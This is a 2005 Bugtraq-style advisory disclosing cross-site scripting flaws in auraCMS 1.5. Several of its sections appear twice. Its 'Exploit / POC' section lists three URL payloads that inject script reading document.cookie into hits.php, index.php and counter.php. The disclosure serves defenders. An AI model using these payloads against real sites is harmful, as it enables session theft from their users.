auraCMS Multiple Cross-Site Scripting Vulnerabilities
BID:12708
Info
auraCMS Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12708 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 02 2005 12:00AM |
| Updated: | Mar 02 2005 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to echo staff <[email protected]> |
| Vulnerable: |
auraCMS auraCMS 1.5 |
| Not Vulnerable: | |
Discussion
auraCMS Multiple Cross-Site Scripting Vulnerabilities
auraCMS is affected by multiple cross-site scripting vulnerabilities.
These issues exist because the application fails to properly sanitize user-supplied input.
Because of these vulnerabilities, an attacker may craft a link containing malicious HTML or script code and present the link to a victim. If the victim user follows the link, the attacker-supplied code will be executed in their browser in the security context of the vulnerable site.
auraCMS is affected by multiple cross-site scripting vulnerabilities.
These issues exist because the application fails to properly sanitize user-supplied input.
Because of these vulnerabilities, an attacker may craft a link containing malicious HTML or script code and present the link to a victim. If the victim user follows the link, the attacker-supplied code will be executed in their browser in the security context of the vulnerable site.
Exploit / POC
auraCMS Multiple Cross-Site Scripting Vulnerabilities
The following examples are available:
http://www.example.com/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
http://www.example.com/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
The following examples are available:
http://www.example.com/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
http://www.example.com/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Solution / Fix
auraCMS Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.